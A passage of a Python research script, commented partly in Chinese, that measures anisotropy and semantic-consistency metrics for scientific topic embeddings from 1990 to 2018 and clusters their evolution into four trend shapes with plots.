sns.distplot(y_sub, hist=True, kde=True, rug=False,\n bins=15,\n # fit=norm,\n hist_kws = {'rwidth':1, 'color':'blue', \"edgecolor\":\"white\", \"histtype\": \"bar\", 'linewidth':1, 'alpha':0.5, \"label\": r\"$MEV(V_j(:t))$ - $MEV(V_j(:t), \\widehat{V_j(:t)})$\"},\n kde_kws = {\"color\": \"red\", \"alpha\":0.5, \"linewidth\": 3, \"shade\":False, \"label\": \"KDE\"},\n #rug_kws = {\"color\": \"black\", \"alpha\":0.25, \"linewidth\": 0.01, \"height\":0.05},\n #fit_kws = {\"color\": \"black\", \"alpha\": 0.25, \"linewidth\": 2, \"linestyle\": \"--\", \"label\": \"\"}\n ax=ax1)\n\n ax2 = plt.twinx()\n sns.distplot(y_diff, hist=True, kde=True, rug=False,\n bins=15,\n # fit=norm,\n hist_kws = {'rwidth':1, 'color':'gray', \"edgecolor\":\"white\", \"histtype\": \"bar\", 'linewidth':1, 'alpha':0.75, \"label\": r\"$MEV(V_j(:t), \\widehat{V_j(:t)})$\"},\n kde_kws = {\"color\": \"red\", \"alpha\":0.5, \"linewidth\": 3, \"shade\":False, \"label\": \"\"},\n #rug_kws = {\"color\": \"black\", \"alpha\":0.25, \"linewidth\": 0.01, \"height\":0.05},\n #fit_kws = {\"color\": \"black\",\"alpha\": 0.25, \"linewidth\": 2, \"linestyle\": \"--\", \"label\": \"\"},\n ax=ax2)\n \n ax1.set_xlabel(r\"Maximum explainable variance ($t$=2018)\")\n ax1.set_ylabel(\"Density\")\n ax2.set_ylabel(\"\")\n ax1.legend(loc='upper left', frameon=False, fontsize=15)\n ax2.legend(loc='upper right', frameon=False, fontsize=15)\n ax1.set_xticks(np.arange(0, 1.1, 0.1))\n ax1.set_xlim(0, 1)\n ax1.set_yticks(np.arange(0, 35, 5))\n ax2.set_yticks(np.arange(0, 175, 25))\n ax2.tick_params(axis='y',colors='gray')\n \n\ndef check_for_anisotropy_from_self_distance(sampling_size_1, max_mp_num,\n min_sampling_times, max_sampling_times, sampling_discount_ratio):\n \"\"\" demostrate the anisotropy in the topic embeddings \"\"\"\n # 说明 存在anisotropy\n # 说明 相同FoS的向量距离 < 不同FoS的向量距离\n\n path_same = \"./temp/self_dis_same_dis.pkl\"\n path_diff = \"./temp/self_dis_diff_dis.pkl\"\n path_rand = \"./temp/vecs_2.pkl\" # 随机向量池\n \n if os.path.exists(path_same) and os.path.exists(path_diff):\n self_dis_same_dis = read_file(path_same)\n self_dis_diff_dis = read_file(path_diff)\n else:\n if os.path.exists(path_rand):\n vecs_2 = read_file(path_rand)\n else:\n vecs_2 = sampling_control_group(1990, 2018)\n \n thresh = 100\n self_dis_same_dis = dict()\n self_dis_diff_dis = dict()\n for fid in tqdm(FoSs):\n dic = read_file(os.path.join(FoS2Vec_path, fid))\n vecs = get_vec_func(dic, 1990, 2018)\n if len(vecs) >= thresh: \n self_dis_same_dis[fid] = calculate_self_distance_func(vecs, vecs, True, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio)\n self_dis_diff_dis[fid] = calculate_self_distance_func(vecs, vecs_2, False, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio)\n save_file(self_dis_same_dis, path_same)\n save_file(self_dis_diff_dis, path_diff)\n\n # 绘制分布\n x = list(self_dis_diff_dis.keys())\n y_diff = 1 / np.array([self_dis_diff_dis[i] for i in x])\n y_same = 1 / np.array([self_dis_same_dis[i] for i in x])\n y_sub = y_same - y_diff \n \n fig = plt.figure(figsize=(8, 6))\n plt.rcParams['savefig.dpi'] = 300\n plt.rcParams['figure.dpi'] = 300\n config = {\n \"font.family\" : \"Times New Roman\",\n \"font.size\" : 20\n }\n rcParams.update(config)\n \n ax1 = sns.distplot(y_same, hist=True, kde=True, rug=False,\n bins=15,\n # fit=norm,\n hist_kws = {'rwidth':1, 'color':'lime', \"edgecolor\":\"white\", \"histtype\": \"bar\", 'linewidth':1, 'alpha':0.75, \"label\": \"$SDIS(V_j(:t))$\"},\n kde_kws = {\"color\": \"red\", \"alpha\":0.5, \"linewidth\": 3, \"shade\":False, \"label\": \"\"},\n # rug_kws = {\"color\": \"black\", \"alpha\":0.25, \"linewidth\": 0.01, \"height\":0.05},\n # fit_kws = {\"color\": \"black\", \"alpha\": 0.25, \"linewidth\": 2, \"linestyle\": \"--\", \"label\": \"Normal\"},\n )\n sns.distplot(y_sub, hist=True, kde=True, rug=False,\n bins=15,\n # fit=norm,\n hist_kws = {'rwidth':1, 'color':'blue', \"edgecolor\":\"white\", \"histtype\": \"bar\", 'linewidth':1, 'alpha':0.5, \"label\": r\"$SDIS(V_j(:t), \\widehat{V_j(:t)})$ - $SDIS(V_j(:t))$\"},\n kde_kws = {\"color\": \"red\", \"alpha\":0.5, \"linewidth\": 3, \"shade\":False, \"label\": \"KDE\"},\n # rug_kws = {\"color\": \"black\", \"alpha\":0.25, \"linewidth\": 0.01, \"height\":0.05},\n # fit_kws = {\"color\": \"black\", \"alpha\": 0.25, \"linewidth\": 2, \"linestyle\": \"--\", \"label\": \"\"},\n ax = ax1)\n ax2 = plt.twinx()\n sns.distplot(y_diff, hist=True, kde=True, rug=False,\n bins=15,\n # fit=norm,\n hist_kws = {'rwidth':1, 'color':'gray', \"edgecolor\":\"white\", \"histtype\": \"bar\", 'linewidth':1, 'alpha':0.75, \"label\": r\"$SDIS(V_j(:t), \\widehat{V_j(:t)})$\"},\n kde_kws = {\"color\": \"red\", \"alpha\":0.5, \"linewidth\": 3, \"shade\":False, \"label\": \"\"},\n # rug_kws = {\"color\": \"black\", \"alpha\":0.25, \"linewidth\": 0.01, \"height\":0.05},\n # fit_kws = {\"color\": \"black\",\"alpha\": 0.25, \"linewidth\": 2, \"linestyle\": \"--\", \"label\": \"\"},\n ax=ax2)\n \n \n ax1.set_xlabel(r\"Self distance ($t$=2018)\")\n ax1.set_ylabel(\"Density\")\n ax2.set_ylabel(\"\")\n ax1.legend(loc='upper left', frameon=False, fontsize=15)\n ax2.legend(loc='upper right', frameon=False, fontsize=15)\n ax1.set_xticks(np.arange(0, 0.5, 0.1))\n ax1.set_yticks(np.arange(0, 35, 5))\n ax2.set_yticks(np.arange(0, 120, 20))\n ax2.tick_params(axis='y',colors='gray')\n\n\ndef results_for_VectorQuality():\n \"\"\" Experiments and results in Section 5.1 \"\"\"\n check_for_anisotropy_from_maximum_explainable_variance()\n check_for_anisotropy_from_self_similarity(1000, 7, 10, 1000, 1)\n check_for_anisotropy_from_self_distance(3000, 7, 10, 1000, 1)\n\n\n#%%\n\"\"\"\n Experiments and results in Section 5.2\n Analyze the evolution pattern of topics' semantic consistency \n (IM, DM, U-shape, Inverted U-shape)\n\"\"\"\n\ndef fit_quadratic_curve(time, y):\n \n def quadratic_curve(x, a, b, c):\n y = a * x**2 + b * x + c\n return y\n \n x = (np.array(time) - min(time)) / (max(time) - min(time))\n popt, pcov = curve_fit(quadratic_curve, x, y)\n y_hat = quadratic_curve(x, *popt)\n r2 = r2_score(y, y_hat)\n return popt, r2, y_hat \n\n\ndef plot_self_similarity(time, ssim, freq, fid, fit=True):\n \"\"\"\n time: 时间; ssim: 逐年累计self similarity; 逐年累计频率; fos name\n \"\"\"\n fig = plt.figure(figsize=(10, 8))\n plt.rcParams['savefig.dpi'] = 300\n plt.rcParams['figure.dpi'] = 300\n config = {\n \"font.family\" : \"Times New Roman\",\n \"font.size\" : 22\n }\n rcParams.update(config)\n plt.rcParams['axes.unicode_minus'] = False \n \n freq = np.array(freq)\n s = freq / np.sum(freq)\n s = np.minimum(np.maximum(s * 3e3, 5), 500)\n \n plt.plot(time, ssim, label=fid[:-4], c='gray')\n plt.scatter(time, ssim, color='red', s=s, marker='s', alpha=0.5)\n freqTexts = list()\n for x, y, f in zip(time, ssim, freq):\n freqText = plt.text(x, y, f, fontsize=15, color = \"black\", \n weight = \"light\", verticalalignment='baseline', \n horizontalalignment='right', rotation=0)\n freqTexts.append(freqText)\n adjust_text(freqTexts, )\n \n if fit:\n popt, r2, y_hat = fit_quadratic_curve(time, ssim)\n plt.plot(time, y_hat, label=r\"$R^2$={:.4f}\".format(r2), c='black', linestyle='--', linewidth=3) \n \n plt.legend()\n plt.xlabel(\"Time\")\n plt.ylabel(\"Self-similarity\")\n plt.xticks(np.arange(min(time), max(time)+1, 1), rotation=45, fontsize=20)\n\n\ndef plot_maximum_explainable_variance(time, mer, freq, fid, fit=True):\n \"\"\"\n time: 时间; mer: 逐年累计maximum_explainable_variance; 逐年累计频率; fos name\n \"\"\"\n fig = plt.figure(figsize=(10, 8))\n plt.rcParams['savefig.dpi'] = 300\n plt.rcParams['figure.dpi'] = 300\n config = {\n \"font.family\" : \"Times New Roman\",\n \"font.size\" : 22\n }\n rcParams.update(config)\n plt.rcParams['axes.unicode_minus'] = False \n \n freq = np.array(freq)\n s = freq / np.sum(freq)\n s = np.minimum(np.maximum(s * 5e3, 3), 500)\n \n plt.plot(time, mer, label=fid[:-4], c='gray')\n plt.scatter(time, mer, color='orange', s=s, marker='o', alpha=0.5)\n freqTexts = list()\n for x, y, f in zip(time, mer, freq):\n freqText = plt.text(x, y, f, fontsize=15, color = \"black\", \n weight = \"light\", verticalalignment='baseline', \n horizontalalignment='right', rotation=0)\n freqTexts.append(freqText)\n if fit:\n popt, r2, y_hat = fit_quadratic_curve(time, mer)\n plt.plot(time, y_hat, label=r\"$R^2$={:.4f}\".format(r2), c='black', linestyle='--', linewidth=3) \n \n plt.legend()\n plt.xlabel(\"Time\")\n plt.ylabel(\"Maximum Explainable Variance\")\n plt.xticks(np.arange(min(time), max(time)+1, 1), rotation=45, fontsize=20)\n\n\ndef plot_self_distance(time, dis, freq, fid, fit=True):\n \"\"\"\n time: 时间; ssim: 逐年累计self similarity; 逐年累计频率; fos name\n \"\"\"\n dis = 1 / np.array(dis)\n \n fig = plt.figure(figsize=(10, 8))\n plt.rcParams['savefig.dpi'] = 300\n plt.rcParams['figure.dpi'] = 300\n config = {\n \"font.family\" : \"Times New Roman\",\n \"font.size\" : 22\n }\n rcParams.update(config)\n plt.rcParams['axes.unicode_minus'] = False \n \n freq = np.array(freq)\n s = freq / np.sum(freq)\n s = np.minimum(np.maximum(s * 3e3, 5), 500)\n \n plt.plot(time, dis, label=fid[:-4], c='gray')\n plt.scatter(time, dis, color='green', s=s, marker='p', alpha=0.5)\n freqTexts = list()\n for x, y, f in zip(time, dis, freq):\n freqText = plt.text(x, y, f, fontsize=15, color = \"black\", \n weight = \"light\", verticalalignment='baseline', \n horizontalalignment='right', rotation=0)\n freqTexts.append(freqText)\n \n if fit:\n popt, r2, y_hat = fit_quadratic_curve(time, dis)\n plt.plot(time, y_hat, label=r\"$R^2$={:.4f}\".format(r2), c='black', linestyle='--', linewidth=3) \n \n plt.legend()\n plt.xlabel(\"Time\")\n plt.ylabel(\"1 / Self-distance\")\n plt.xticks(np.arange(min(time), max(time)+1, 1), rotation=45, fontsize=20)\n\n\ndef plot_all_metrics(time, ssim, mer, sdis, freq, fid, \n ssim_=[], mer_=[], sdis_=[], fit=True, normalized=True, cls_type=''):\n\n fig = plt.figure(figsize=(8, 6))\n plt.rcParams['savefig.dpi'] = 300\n plt.rcParams['figure.dpi'] = 300\n config = {\n \"font.family\" : \"Times New Roman\",\n \"font.size\" : 12\n }\n rcParams.update(config)\n plt.rcParams['axes.unicode_minus'] = False \n\n sdis = 1 / np.array(sdis)\n sdis_ = 1 / np.array(sdis_)\n \n ssim_normalized = (ssim - min(ssim)) / (max(ssim) - min(ssim))\n mer_normalized = (mer - min(mer)) / (max(mer) - min(mer))\n sdis_normalized = (sdis - min(sdis)) / (max(sdis) - min(sdis))\n \n ssim_normalized = (ssim - np.mean(ssim)) / np.std(ssim)\n mer_normalized = (mer - np.mean(mer)) / np.std(mer)\n sdis_normalized = (sdis - np.mean(sdis)) / np.std(sdis)\n avg_metric = (ssim_normalized + mer_normalized + sdis_normalized) / 3\n \n Y = [ssim, mer, sdis, avg_metric]\n Y_= [ssim_, mer_, sdis_, []]\n C = [\"red\", \"blue\", \"green\", \"black\"]\n S = [\"s\", \"o\", \"p\", \"+\"]\n Ylabel = [r\"$SSIM$\", r\"$MEV$\", r\"$SDIS^{-1}$\", r\"$1/3*(SSIM+MEV+SDIS^{-1}$)\"]\n \n for i in range(len(Y)):\n ax = plt.subplot(2, 2, i+1)\n if not normalized:\n Y_i = np.array(Y[i])\n else:\n Y_i = np.array(Y[i])\n Y_i = (Y_i - min(Y_i)) / (max(Y_i) - min(Y_i))\n ax.plot(time, Y_i, linewidth=1, linestyle='--', c=C[i], marker=S[i], markersize=4)\n \n # 轴刻度\n ax.yaxis.set_major_formatter(mtick.FormatStrFormatter('%.3f'))\n up_y = math.ceil(max(Y_i) * 1000)\n down_y = math.floor(min(Y_i) * 1000)\n yticks = np.linspace(down_y, up_y, 5) / 1000\n ax.set_yticks(yticks)\n # ax.set_ylim(yticks[0], yticks[-1])\n if min(time) % 10 >= 5:\n down_x = min(time) // 10 * 10 + 5\n else:\n down_x = min(time) // 10 * 10\n up_x = 2025\n xticks = np.arange(down_x, up_x, 5)\n ax.set_xticks(xticks)\n \n # 对照组\n if len(Y_[i]) != 0:\n if not normalized:\n Y_i_ = np.array(Y_[i])\n else:\n Y_i_ = np.array(Y_[i])\n Y_i_ = (Y_i_ - min(Y_i_)) / (max(Y_i_) - min(Y_i_))\n ax.plot(time, Y_i_, c='gray', linewidth=1, linestyle='--')\n ax.scatter(time, Y_i_, color='gray', s=25, marker=S[i], alpha=1)\n ax.set_xlabel(\"Time\")\n ax.set_ylabel(Ylabel[i])\n \n # 二次函数拟合\n if fit and i == 3:\n popt, r2, y_hat = fit_quadratic_curve(time, Y[i])\n ax.plot(time, y_hat, label=r\"${:.3f}t^2+{:.3f}t+{:.3f}$\".format(popt[0], popt[1], popt[2]) +\"\\n\" + r\"$R^2={:.3f}$\".format(r2),\n c='gray', linestyle='-.', linewidth=1) \n ax.legend(frameon=False, fontsize=11) \n ax.set_xticks(xticks)\n plt.suptitle(fid[:-4] + \" ({})\".format(cls_type), fontsize=20, fontweight='bold')\n plt.tight_layout()\n\n \ndef calculate_metrics(dic, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio):\n \"\"\"\n calculate original metics\n Self-similarity; Self-distance; Maximum explainable variance\n \"\"\"\n year_list = dic.keys()\n year_list = sorted(year_list)\n start_year = max(min(year_list), 1990)\n end_year = min(max(year_list), 2018)\n \n ssim = list() # self-similarity\n mer = list() # maximum_explainable_variance\n sdis = list() # self-distance\n freq = list() # word frequency\n time = list() # year\n for year in range(start_year, end_year + 1):\n vecs = get_vec_func(dic, start_year, year)\n if len(vecs) < 10:\n continue\n # 逐年计算语义一致性指标\n SSIM = calculate_self_similarity_func(vecs, vecs, True, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio)\n MER = maximum_explainable_variance_func(vecs)\n SDIS = calculate_self_distance_func(vecs, vecs, True, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio)\n FREQ = len(vecs)\n \n ssim.append(SSIM)\n mer.append(MER)\n sdis.append(SDIS)\n freq.append(FREQ)\n time.append(year)\n return ssim, mer, sdis, freq, time\n\n\ndef calculate_metrics_random(dic, vecs_2, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio):\n \"\"\"\n calculate random metics\n \"\"\"\n year_list = dic.keys()\n year_list = sorted(year_list)\n start_year = max(min(year_list), 1990)\n end_year = min(max(year_list), 2018)\n \n ssim = list() # self-similarity\n mer = list() # maximum_explainable_variance\n sdis = list() # self-distance\n freq = list() # word frequency\n time = list() # year\n for year in range(start_year, end_year + 1):\n vecs = get_vec_func(dic, start_year, year)\n if len(vecs) < 10:\n continue\n # 获取主题向量池\n shuffle_index = np.arange(len(vecs))\n random.shuffle(shuffle_index)\n control_size = min(len(vecs), 10000)\n shuffle_index = shuffle_index[:control_size]\n vecs_1_part = vecs[shuffle_index, :]\n \n # 获取等量随机向量池\n shuffle_index = np.arange(len(vecs_2))\n random.shuffle(shuffle_index)\n control_size = min(min(len(vecs), len(vecs_2)), 5000)\n shuffle_index = shuffle_index[:control_size]\n vecs_2_part = vecs_2[shuffle_index, :]\n \n # 逐年计算语义一致性指标-基于随机向量组\n SSIM = calculate_self_similarity_func(vecs_1_part, vecs_2_part, False, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio)\n MER = maximum_explainable_variance_func(vecs_2_part)\n SDIS = calculate_self_distance_func(vecs_1_part, vecs_2_part, False, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio)\n FREQ = len(vecs)\n del vecs_1_part\n del vecs_2_part\n \n ssim.append(SSIM)\n mer.append(MER)\n sdis.append(SDIS)\n freq.append(FREQ)\n time.append(year)\n return ssim, mer, sdis, freq, time\n\n\ndef calculate_metrics_shuffle(dic, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio):\n \"\"\" shuffle embeddings, calculate ssim, mer, sdis\"\"\"\n # 该主题所有向量构成的向量池\n all_vecs = list() \n for year in dic:\n all_vecs += dic[year] \n random.shuffle(all_vecs)\n # 类内乱序\n dic_shuffle = dict()\n for year in dic:\n sample_num = len(dic[year])\n vecs = random.sample(all_vecs, sample_num)\n dic_shuffle[year] = vecs\n # 年份洗牌后, 计算语义一致性指标\n ssim, mer, sdis, freq, time = calculate_metrics(dic_shuffle, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio)\n return ssim, mer, sdis, freq, time\n\n\ndef plot_3d_func(fos, results, FoS2Vec_path, cls_type=''):\n \"\"\"逐年散点3d图\"\"\"\n dic = read_file(os.path.join(FoS2Vec_path, fos)) # fos的向量字典\n _, _, _, _, time = results[fos]\n beg_year = min(time) # fos的启���年\n end_year = max(time) # fos的最后一年 2018\n vecs = get_vec_func(dic, 1990, 2018) # 1990 - 2018 所有向量\n pca = decomposition.PCA(n_components=3) # pca \n pca.fit(vecs)\n vecs_3d_list = dict()\n for year in range(beg_year, end_year + 1):\n vecs_i = get_vec_func(dic, year, year)\n if len(vecs_i) != 0: \n vecs_i_3d = pca.transform(vecs_i)\n vecs_3d_list[year] = vecs_i_3d\n else:\n vecs_3d_list[year] = []\n dates = np.arange(beg_year, end_year + 1) # Time\n colors = np.linspace(-1, 1, len(dates)) # color bar \n\n # 绘图\n fig = plt.figure(figsize=(12, 8))\n plt.rcParams['savefig.dpi'] = 300\n plt.rcParams['figure.dpi'] = 300\n config = {\n \"font.family\" : \"Times New Roman\",\n \"font.size\" : 10\n }\n rcParams.update(config)\n ax = fig.add_subplot(111, projection='3d')\n \n xyzcs = list() # (x, y, z, color)\n cents = list()\n for i, year in enumerate(range(beg_year, end_year + 1)):\n vecs_i_3d = vecs_3d_list[year]\n if len(vecs_i_3d) == 0:\n continue\n \n samples_size = min(len(vecs_i_3d), 100)\n print(\"{}/{}\".format(samples_size, len(vecs_i_3d)))\n \n vecs_i_3d = random.sample(list(vecs_i_3d), samples_size)\n vecs_i_3d = np.array(vecs_i_3d)\n \n xs = vecs_i_3d[:, 0]\n ys = vecs_i_3d[:, 1]\n zs = vecs_i_3d[:, 2]\n cs = colors[i] * np.ones(len(xs))\n xyzcs.append(np.array([xs, ys, zs, cs]))\n cents.append(np.array([np.mean(xs), np.mean(ys), np.mean(zs), colors[i]]))\n # break\n \n cmap = 'seismic'\n cmap2= \"Greens\"\n xyzcs = np.concatenate(xyzcs, axis=-1) \n ax.scatter(xyzcs[0, :], xyzcs[1, :], xyzcs[2, :], c=xyzcs[3, :], cmap=cmap, s=2, alpha=0.4)\n \n # cents = np.array(cents)\n # points = cents[:, :3]\n # points = points.reshape(-1, 1, 3)\n # segments = np.concatenate([points[:-1], points[1:]], axis=1)\n # lc = Line3DCollection(segments, cmap=plt.get_cmap(cmap2), linestyles='dashed')\n # lc.set_array(cents[:, 3]) # 设置颜色\n # lc.set_linewidth(1.5)\n # ax.add_collection3d(lc)\n # ax.scatter(cents[:, 0], cents[:, 1], cents[:, 2], c=cents[:, 3], cmap=cmap2, s=15, marker='<') \n # ax.legend(frameon=False)\n \n # 轴刻度\n ax.yaxis.set_major_formatter(mtick.FormatStrFormatter('%.3f'))\n up_x = math.ceil(max(xyzcs[0, :]) * 1000)\n down_x = math.floor(min(xyzcs[0, :]) * 1000)\n xticks = np.linspace(down_x, up_x, 5) / 1000\n ax.set_xticks(xticks)\n \n up_y = math.ceil(max(xyzcs[1, :]) * 1000)\n down_y = math.floor(min(xyzcs[1, :]) * 1000)\n yticks = np.linspace(down_y, up_y, 5) / 1000\n ax.set_yticks(yticks)\n \n up_z = math.ceil(max(xyzcs[2, :]) * 1000)\n down_z = math.floor(min(xyzcs[2, :]) * 1000)\n zticks = np.linspace(down_z, up_z, 5) / 1000\n ax.set_zticks(zticks)\n plt.title(fos[:-4] + \" ({})\".format(cls_type), fontsize=20, fontweight='bold')\n \n # color bar\n labels = [str(i) for i in dates]\n norm = Normalize(vmin=colors.min(), vmax=colors.max())\n cb = fig.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap),\n ax=ax,\n ticks=colors, fraction=0.027, pad=0.02, shrink=1.0)\n cb.ax.set_yticklabels(labels)\n plt.show()\n\n\ndef results_for_EvolutionTrends():\n \"\"\" Experiments and results in Section 4.2\n Four general evolution pattern of topic consistency is identified based on the K-Means algorithm.\n \"\"\"\n \"\"\" 逐年计算主题的语义一致性指标 \"\"\"\n \n thresh = 100\n sampling_size_1 = 1000\n max_mp_num = 7\n max_sampling_times = 100\n min_sampling_times = 20\n sampling_discount_ratio = 0.5\n \n results_file_path = \"./temp/results_for_evolutionary_trajectory.pkl\"\n random_file_path = \"./temp/results_for_evolutionary_trajectory(random).pkl\"\n path_rand = \"./temp/vecs_2.pkl\" # 随机向量池\n \n # (1)计算原指标\n if os.path.exists(results_file_path):\n results = read_file(results_file_path)\n # 检查是否所有主题的指标被全部计算, 否则补算\n for fid in tqdm(FoSs):\n if fid in results:\n continue \n dic = read_file(os.path.join(FoS2Vec_path, fid))\n vecs = get_vec_func(dic, 1990, 2018)\n if len(vecs) >= thresh:\n (ssim, mer, sdis, freq, time) = calculate_metrics(dic, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio)\n results[fid] = (ssim, mer, sdis, freq, time)\n save_file(results, results_file_path)\n else:\n # 计算指标\n results = dict()\n for fos in tqdm(FoSs):\n dic = read_file(os.path.join(FoS2Vec_path, fos))\n vecs = get_vec_func(dic, 1990, 2018)\n if len(vecs) >= thresh:\n ssim, mer, sdis, freq, time = calculate_metrics(dic, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio)\n results[fos] = (ssim, mer, sdis, freq, time)\n save_file(results, results_file_path)\n \n # 计算随机指标 (运算速度慢)\n if os.path.exists(path_rand):\n vecs_2 = read_file(path_rand)\n else:\n vecs_2 = sampling_control_group(1990, 2018)\n # \n if os.path.exists(random_file_path):\n # 检查是否所有主题的指标被全部计算, 否则补算\n results_random = read_file(random_file_path)\n count = 0\n for fid in tqdm(FoSs):\n count += 1\n if fid in results_random:\n continue \n dic = read_file(os.path.join(FoS2Vec_path, fid))\n vecs = get_vec_func(dic, 1990, 2018)\n if len(vecs) >= thresh:\n ssim, mer, sdis, freq, time = calculate_metrics_random(dic, vecs_2, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio)\n results_random[fid] = (ssim, mer, sdis, freq, time)\n # 每计算100个主题, 储存/次\n if count >= 100:\n save_file(results_random, random_file_path)\n count = 0\n save_file(results_random, random_file_path)\n else:\n results_random = dict()\n count = 0\n for fos in tqdm(FoSs):\n count += 1\n dic = read_file(os.path.join(FoS2Vec_path, fos))\n vecs = get_vec_func(dic, 1990, 2018)\n if len(vecs) >= thresh:\n ssim, mer, sdis, freq, time = calculate_metrics_random(dic, vecs_2, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio)\n results_random[fos] = (ssim, mer, sdis, freq, time) \n if count >= 100:\n save_file(results_random, random_file_path)\n count = 0 \n save_file(results_random, random_file_path)\n \n # 读取随机指标\n path_ssim_diff = \"./temp/self_sim_diff_dis.pkl\"\n path_mer_diff = \"./temp/mer_diff_dis.pkl\"\n path_sdis_diff = \"./temp/self_dis_diff_dis.pkl\"\n path_anisotropy_adjusted_res =\"./temp/anisotropy_adjusted_res.pkl\"\n \n ssim_diff = read_file(path_ssim_diff)\n mer_diff = read_file(path_mer_diff)\n sdis_diff = read_file(path_sdis_diff)\n \n # exlcude anisotropy\n anisotropy_adjusted_res = dict()\n for fid in tqdm(results):\n ssim, mer, sdis, freq, time = results[fid]\n ssim = list(np.array(ssim) - ssim_diff[fid])\n mer = list(np.array(mer) - mer_diff[fid])\n sdis = list(1/np.array(sdis) - 1/sdis_diff[fid])\n anisotropy_adjusted_res[fid] = (ssim, mer, sdis, freq, time)\n save_file(anisotropy_adjusted_res, path_anisotropy_adjusted_res)\n \n \n \"\"\"\n K-Means: 时间序列数据聚类分析\n \"\"\"\n anisotropy_adjusted_res = read_file(path_anisotropy_adjusted_res)\n # 生成tslearn需要的时间序列数据输入, 长度不同的时期序列使用nan补齐\n time_len = 5\n fids = list()\n X_bias = list()\n for fid in anisotropy_adjusted_res:\n ssim, mer, sdis, freq, time = anisotropy_adjusted_res[fid]\n if len(time) >= time_len:\n ts_fid = np.array([ssim, mer, sdis]).T\n fids.append(fid)\n X_bias.append(ts_fid)\n X_bias = tslearn.utils.to_time_series_dataset(X_bias)\n # 标准化处理 - 聚类的目标是识别形状 (compare shapes in an amplitude-invariant manner)\n X_bias = TimeSeriesScalerMeanVariance(mu=0, std=1).fit_transform(X_bias)\n \n # 聚类, dynamic time warping (dtw) - 时间调整对齐距离\n n_clusters = 4\n path_kmeans_res = './temp/TimeSeriesKMeans(km={}).pkl'.format(n_clusters)\n if not os.path.exists(path_kmeans_res):\n km = TimeSeriesKMeans(n_clusters=n_clusters, max_iter=10, metric='dtw', n_jobs=6)\n km.fit(X_bias)\n save_file(km, path_kmeans_res) # 存放模型\n else:\n km = read_file(path_kmeans_res) # 读取模型\n Y_label = km.predict(X_bias)\n # km.transform(X_bias)\n \n # 聚类效果分析 - 质心\n fig = plt.figure(figsize=(8, 8)) # 10, 8\n plt.rcParams['savefig.dpi'] = 300\n plt.rcParams['figure.dpi'] = 300\n config = {\n \"font.family\" : \"Times New Roman\",\n \"font.size\" : 15\n }\n rcParams.update(config)\n plt.rcParams['axes.unicode_minus'] = False \n \n for i in range(n_clusters):\n if n_clusters == 4:\n ax = plt.subplot(2, 2, i+1)\n cluster_type = {0: 0, 1: 3, 2: 2, 3: 1}\n cluster_name = [\"IM\", \"DM\", \"U-shape\", \"Inverted U-shape\"]\n \n if n_clusters == 5:\n ax = plt.subplot(3, 2, i+1)\n cluster_type = {0: 0, 1: 1, 2: 2, 3: 3, 4:4}\n cluster_name = [\"Inverted U-shape\", \"U-shape\", \"IM\", \"DM\", \"IM or Inverted U-shape\"]\n \n if n_clusters == 6:\n ax = plt.subplot(3, 2, i+1)\n cluster_type = {0: 0, 1: 1, 2: 2, 3: 3, 4:4, 5:5}\n cluster_name = [\"DM\", \"U-shape or IM\", \"U-shape\", \"Inverted U-shape\", \"IM\", \"Inverted U-shape\"]\n \n yi = cluster_type[i]\n \n for xx in X_bias[Y_label == yi]:\n ax.plot(np.mean(xx, axis=-1), alpha=.02, c='gray')\n class_num = len(X_bias[Y_label == yi])\n total_num = len(X_bias)\n class_r = class_num / total_num\n \n centroid_yi = km.cluster_centers_[yi]\n # pca = PCA(n_components=1)\n # centroid_yi_ = pca.fit_transform(centroid_yi) # pca可能改变单调性\n \n # 类别的质心\n centroid_yi_mu = np.mean(centroid_yi, axis=-1)\n centroid_yi_mu_smooth = np.convolve(centroid_yi_mu, np.ones(1) / 1,'vlid')\n plt.plot(centroid_yi_mu_smooth, c=\"r\", linestyle=\"--\", linewidth=2)\n \n # 二次函数拟合质心\n # popt, r2, y_hat = fit_quadratic_curve(np.arange(len(centroid_yi_mu)), centroid_yi_mu)\n # plt.plot(y_hat, c=\"blue\", linestyle=\"dotted\", linewidth=2)\n \n ax.set_title(cluster_name[i])\n \n plt.text(0.5, 0.5, \"{}\\n{:.2f}%\".format(class_num, 100 * class_r), \n transform=plt.gca().transAxes, color='black', fontsize=20)\n\n plt.ylim(-3, 3)\n plt.xticks(np.arange(0, 35, 5))\n plt.xlim(0, 30)\n plt.xlabel(\"Time\")\n plt.ylabel(r\"$1/3(SSIM+MEV+SDIS)$\")\n plt.tight_layout()\n\n \"\"\"\n Case study 案例分析\n \"\"\"\n fid2AVG = dict() # 三个指标normalized, 然而取平均\n km_results = dict() # \n for yi, xi, fid in zip(Y_label, X_bias, fids):\n fid2AVG[fid] = np.mean(xi, axis=-1)\n if yi not in km_results:\n km_results[yi] = dict()\n km_results[yi][\"samples\"] = list()\n km_results[yi][\"cluster_centers_\"] = km.cluster_centers_[yi]\n km_results[yi][\"samples\"].append(fid)\n \n # 倒U型, 上升类, 下降类, 正U型\n yi = 0\n fos = random.sample(km_results[yi][\"samples\"], 1)[0]\n (ssim, mer, sdis, freq, time) = anisotropy_adjusted_res[fos]\n plot_all_metrics(time, ssim, mer, sdis, freq, fos, [], [], [], fit=True, normalized=False)\n \n \"\"\" \n 可视化分析 \n \"\"\"\n # FoSs = list(anisotropy_adjusted_res.keys())\n # fos = random.sample(FoSs, 1)[0]\n # class_idx = 0\n # fos = random.sample(km_results[class_idx]['samples'], 1)[0]\n fos = \"semantic network.pkl\".lower()\n 